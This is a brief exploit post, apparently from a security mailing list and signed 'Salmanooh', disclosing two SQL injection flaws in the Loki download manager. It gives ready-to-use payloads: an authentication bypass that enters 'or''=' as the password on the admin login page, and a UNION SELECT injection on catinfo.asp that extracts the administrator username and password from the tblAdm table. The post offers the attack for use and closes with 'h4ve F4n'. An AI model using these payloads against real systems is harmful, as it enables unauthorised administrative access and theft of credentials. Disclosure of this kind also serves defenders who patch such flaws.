The Loki download manager is susceptible to SQL injection attacks.
0245509c2ac467e21c07125f4d197a522ac9413996459e09d2d7d51ee23775cf
hi all
tow SQL injection in Loki download manager
1. in https://localhost/adm/default.asp
user: anyuser
pass: 'or''='
2. in https://localhost/downmancv/catinfo.asp?cat=' union select null,null,user,null,null,null,null,null,pass,null,null,null,null,null FROM tblAdm '
and u will have user and pass h4ve F4n
Salmanooh
hack_912@hotmail.com